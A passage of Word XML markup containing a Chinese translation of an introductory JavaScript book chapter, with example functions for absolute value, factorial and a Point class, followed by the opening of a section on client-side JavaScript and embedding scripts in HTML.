      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>我们称为</w:t>
      </w:r>
      <w:r>
        <w:t>b*b);//</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>Math.sqrt()</w:t>
      </w:r>
      <w:r>
        <w:t>来计算平方根</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>points.dist()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1.414:</w:t>
      </w:r>
      <w:r>
        <w:t>求得两个点之间的距离</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>现在，给出一些控制语句的例子，这里的示例函数体内包含了最常见的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>控制语句：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这些</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语句使用该语法包含条件判断和循环</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用了类似</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>和其他语言的语法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function abs(x){//</w:t>
      </w:r>
      <w:r>
        <w:t>求绝对值的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(x</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>=0){//if</w:t>
      </w:r>
      <w:r>
        <w:t>语句</w:t>
      </w:r>
      <w:r>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:t>x;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果比较结果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>则执行这里的代码</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>子句的结束</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>条件不满足时执行</w:t>
      </w:r>
      <w:r>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:t>子句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return-x;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果分支中只有一条语句，花括号是可以省略的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t>if/else</w:t>
      </w:r>
      <w:r>
        <w:t>中嵌套的</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function factorial(n){//</w:t>
      </w:r>
      <w:r>
        <w:t>计算阶乘的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var product=1;//</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>product</w:t>
      </w:r>
      <w:r>
        <w:t>赋值为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(n</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1){//</w:t>
      </w:r>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>内的表达式为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>时循环执行</w:t>
      </w:r>
      <w:r>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:t>内的代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>product*=n;//"product=product*n;"</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>简写形式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n--;//"n=n-1;"</w:t>
      </w:r>
      <w:r>
        <w:t>的简写形式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>循环结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return product;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>product</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>factorial(4)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>24:1*4*3*2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function factorial2(n){//</w:t>
      </w:r>
      <w:r>
        <w:t>实现循环的另一种写法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i,product=1;//</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>product</w:t>
      </w:r>
      <w:r>
        <w:t>赋值为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(i=2;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=n;i++)//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>自增至</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>product*=i;//</w:t>
      </w:r>
      <w:r>
        <w:t>循环体，当循环体中只有一句代码，可以省略</w:t>
      </w:r>
      <w:r>
        <w:t>{}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return product;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回计算好的阶乘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>factorial2(5)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>120:1*2*3*4*5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是一种面向对象的编程语言，但和传统的面向对象又有很大区别。第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章将详细讲解</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的面向对象编程，这一章有大量的示例代码，是本书中最长的一章。这里有一个简单的示例，这段代码展示了如何在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中定义一个类来表示</w:t>
      </w:r>
      <w:r>
        <w:t>2D</w:t>
      </w:r>
      <w:r>
        <w:t>平面几何中的点。这个类实例化的对象拥有一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>r()</w:t>
      </w:r>
      <w:r>
        <w:t>的方法，用来计算该点到原点的距离：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个构造函数以初始化一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Point</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function Point(x,y){//</w:t>
      </w:r>
      <w:r>
        <w:t>按</w:t>
      </w:r>
      <w:r>
        <w:t>照惯例，构造函数均以大写字母开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.x=x;//</w:t>
      </w:r>
      <w:r>
        <w:t>关键字</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>指代初始化的实例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.y=y;//</w:t>
      </w:r>
      <w:r>
        <w:t>将函数参数存储为对象的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>不需要</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>关键字和构造函数来创建一个实例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var p=new Point(1,1);//</w:t>
      </w:r>
      <w:r>
        <w:t>平面几何中的点</w:t>
      </w:r>
      <w:r>
        <w:t>(1,1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>通过给构造函数的</w:t>
      </w:r>
      <w:r>
        <w:t>prototye</w:t>
      </w:r>
      <w:r>
        <w:t>对象赋值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>来给</w:t>
      </w:r>
      <w:r>
        <w:t>Point</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Point.prototype.r=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return Math.sqrt(//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>+y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6Text"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>的平方根</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.x*this.</w:t>
      </w:r>
      <w:r>
        <w:t>x+//this</w:t>
      </w:r>
      <w:r>
        <w:t>指代调用这个方法的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>this.y*this.y);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//Point</w:t>
      </w:r>
      <w:r>
        <w:t>的实例对象</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>（以及所有的</w:t>
      </w:r>
      <w:r>
        <w:t>Point</w:t>
      </w:r>
      <w:r>
        <w:t>实例对象）继承了方法</w:t>
      </w:r>
      <w:r>
        <w:t>r()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>p.r()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1.414...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章是第一部分的精华所在，后续的各章做了一些零星的延伸，将我们对</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心的探索带向尾声。第</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>章主要讲解了正则表达式的语法，并演示了如何使用这些</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>进行文本的模式匹配。第</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心的子集和超集。最后，在进入客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的内容之前，第</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍两种在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器之外的两种</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScirpt</w:t>
      </w:r>
      <w:r>
        <w:t>运行环境。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>F12</w:t>
      </w:r>
      <w:r>
        <w:t>用来唤醒</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>关闭</w:t>
      </w:r>
      <w:r>
        <w:t>Firebug</w:t>
      </w:r>
      <w:r>
        <w:t>操作面板，</w:t>
      </w:r>
      <w:r>
        <w:t>Ctrl+Shift+J</w:t>
      </w:r>
      <w:r>
        <w:t>用来唤醒错误控制台</w:t>
      </w:r>
      <w:r>
        <w:t>(Error Console)</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>这里</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>名称</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>含义是指函数具有固定标识，并不是指函数变量名称。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="1_2_Ke_Hu_Duan_JavaScript"/>
      <w:bookmarkStart w:id="22" w:name="1_2_Ke_Hu_Duan_JavaScript____JavaScriptY"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心部分的内容中的知识点交叉引用比较多，且知识点的层次感并不分明。而在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>部分的内容编排方式有了较大改变。依照本书给定的知识点顺序进行学习，完全可以学会如何在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>。但如果你想通过阅读本书来学习客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的话，不能只将眼光落在第二部分，所以本节会对于客户端编程技术做一个快速概览，随后会给出一个有深度的示例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:t>章是第二部分的第一章，该章介绍如何让</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中运行起来。从该章学到的最重要的</w:t>
      </w:r>
      <w:r>
        <w:t>内容是，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码可以通过＜</w:t>
      </w:r>
      <w:r>
        <w:t>scirpt</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签来嵌入到</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件中：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pP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script src="library.js"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>引入一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>库</w:t>
      </w:r>
      <w:r>
        <w:t>--</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p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>This is a paragraph of HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在这里编写嵌入到</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件中的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Here is more HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/P</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lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:t>章讲解</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器端脚本技术，并涵盖客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的一些重要全局函数，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
